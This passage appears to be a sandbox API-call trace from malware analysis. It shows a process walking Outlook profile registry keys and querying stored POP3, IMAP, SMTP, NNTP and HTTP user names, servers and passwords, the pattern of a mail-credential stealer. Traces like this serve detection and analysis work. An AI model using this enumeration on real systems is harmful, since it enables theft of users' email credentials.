lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.201] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.201] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.201] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.202] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.202] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.202] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.203] RegCloseKey (hKey=0x95c) returned 0x0 [0249.203] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.203] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.204] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.204] RegCloseKey (hKey=0x95c) returned 0x0 [0249.204] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\626dbd3f36ef4b4b9263a867695919ec", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.205] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.205] RegCloseKey (hKey=0x95c) returned 0x0 [0249.205] LocalFree (hMem=0x5d67060) returned 0x0 [0249.205] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x7, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8503020000000000c000000000000046", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.205] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.205] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d68100 [0249.205] wsprintfA (in: param_1=0x5d68100, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0249.205] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.205] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.205] RegCloseKey (hKey=0x95c) returned 0x0 [0249.205] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.205] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.205] RegCloseKey (hKey=0x95c) returned 0x0 [0249.205] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.205] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.205] RegCloseKey (hKey=0x95c) returned 0x0 [0249.205] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.205] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.205] RegCloseKey (hKey=0x95c) returned 0x0 [0249.205] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.206] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.206] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.206] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.207] RegCloseKey (hKey=0x95c) returned 0x0 [0249.207] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.207] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, 